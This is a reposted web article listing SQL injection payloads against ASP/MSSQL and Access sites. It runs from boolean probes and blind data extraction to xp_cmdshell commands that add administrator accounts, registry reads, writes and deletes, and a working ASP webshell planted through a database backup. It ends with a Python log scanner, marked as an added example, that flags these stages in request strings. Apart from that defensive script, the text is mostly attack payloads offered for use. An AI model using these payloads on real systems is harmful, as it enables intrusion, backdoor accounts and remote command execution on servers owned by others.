ASP Injection Summary

xiaoxiao2021-03-06  60

Topic: Summary of ASP injection methods

1. Judge whether there is an injection
    ;and 1=1
    ;and 1=2

2. Preliminary check for MSSQL
    ;and user>0

3. Determine the database system
    ;and (select count(*) from sysobjects)>0    (MSSQL)
    ;and (select count(*) from msysobjects)>0   (Access)

4. Injection parameter is a character string
    'and [query conditions] and ''='

5.
    'and [query conditions] and '%25'='

6. Guess the database
    ;and (select count(*) from [database name])>0

7. Guess the field
    ;and (select count([field name]) from [database name])>0

8. Guess the record length of a field
    ;and (select top 1 len([field name]) from [database name])>0

9. (1) Guess the ASCII value of a field
    ;and (select top 1 asc(mid([field name],1,1)) from [database name])>0
   (2) Guess the ASCII value of a field (MSSQL)
    ;and (select top 1 unicode(substring([field name],1,1)) from [database name])>0

10. Test the permission structure (MSSQL)
    ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
    ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
    ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
    ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
    ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
    ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
    ;and 1=(select IS_MEMBER('db_owner'));--

11. Add MSSQL and system accounts
    ;exec master.dbo.sp_addlogin username;--
    ;exec master.dbo.sp_password null,username,password;--
    ;exec master.dbo.sp_addsrvrolemember sysadmin username;--
    ;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
    ;exec master.dbo.xp_cmdshell 'net user username password /add';--
    ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12. (1) Traverse directories
    ;create table dirs(paths varchar(100), id int)
    ;insert dirs exec master.dbo.xp_dirtree 'c:\'
    ;and (select top 1 paths from dirs)>0
    ;and (select top 1 paths from dirs where paths not in('Paths'))>0
    (2) Traverse directories
    ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
    ;insert temp exec master.dbo.xp_availablemedia;--                      (get all current drives)
    ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--              (get the subdirectory list)
    ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--         (get the directory tree of all subdirectories)
    ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   (view file contents)

13. MSSQL stored procedures
    xp_regenumvalues root key, subkey
    ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
        Returns all values under the key.
    xp_regread root key, subkey, value name
    ;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
        Returns the value.
    xp_regwrite root key, subkey, value name, value type, value
        There are two value types: REG_SZ represents a character type, REG_DWORD represents an integer.
    ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
        Writes into the registry.
    xp_regdeletevalue root key, subkey, value name
    ;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
        Deletes a value.
    xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
        Deletes the key, including all values of this key.

14. MSSQL backup to create a webshell
    use model
    create table cmd(str image);
    insert into cmd(str) values ('<% Dim oScript %>');
    backup database model to disk='c:\l.asp';

15. MSSQL built-in functions
    ;and (select @@version)>0      (gets the Windows version number)
    ;and user_name()='dbo'         (judges whether the connection user of the current system is sa)
    ;and (select user_name())>0    (reveals the current system connection user)
    ;and (select db_name())>0      (gets the current connection database)

16. Simple webshell
    use model
    create table cmd(str image);
    insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
    backup database model to disk='g:\wwward\l.asp';
    The request then looks like this: http://ip/l.asp?c=dir
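The probes and stored-procedure calls listed above leave recognisable strings in request query strings. The following Python sketch is an added example, not part of the original post: it decodes each query string (twice, to cover double URL encoding) and reports which stage of the list it matches. The log format, sample lines, stage names and regexes are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Stage -> regex, one per group of steps in the post. Stage names and
# patterns are choices made for this example, not an exhaustive ruleset.
SIGNATURES = {
    "boolean-probe": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "dbms-fingerprint": re.compile(r"\bm?sysobjects\b|\buser\s*>\s*0"),
    "blind-extraction": re.compile(r"select\s+top\s+1\s+(?:len|asc|unicode)\s*\("),
    "privilege-check": re.compile(r"\bis_(?:srvrole)?member\s*\("),
    "account-creation": re.compile(r"\bsp_(?:addlogin|password|addsrvrolemember)\b"),
    "os-or-registry": re.compile(r"\bxp_(?:cmdshell|dirtree|subdirs|availablemedia|reg\w+)\b"),
    "backup-to-script": re.compile(r"backup\s+database\b.*\bto\s+disk\s*=\s*'[^']*\.asp"),
}

def normalize(query):
    """Decode twice (covers %2527-style double encoding), lowercase, squeeze whitespace."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded.lower())

def classify(query):
    """Return the stages whose signature appears in one raw query string."""
    text = normalize(query)
    return [stage for stage, rx in SIGNATURES.items() if rx.search(text)]

def scan(log_lines):
    """Return (client_ip, uri, stages) for each suspicious 'ip method uri query' line."""
    hits = []
    for line in log_lines:
        parts = line.split(" ", 3)
        if len(parts) == 4 and (stages := classify(parts[3])):
            hits.append((parts[0], parts[2], stages))
    return hits

# Constructed sample requests (documentation IP range, made-up pages).
SAMPLE_LOG = [
    "203.0.113.5 GET /list.asp id=222",
    "203.0.113.5 GET /search.asp q=black+and+white",
    "203.0.113.9 GET /list.asp id=222%20and%201=1",
    "203.0.113.9 GET /list.asp id=222;and+(select+count(*)+from+sysobjects)>0",
    "203.0.113.9 GET /list.asp id=222;and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));--",
    "203.0.113.9 GET /list.asp id=222%253Bexec%2520master.dbo.xp_dirtree%2520%2527c:%2527",
]

if __name__ == "__main__":
    for ip, uri, stages in scan(SAMPLE_LOG):
        print(ip, uri, ", ".join(stages))
```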

When reprinting, please cite the original address: https://www.9cbs.com/read-85961.html
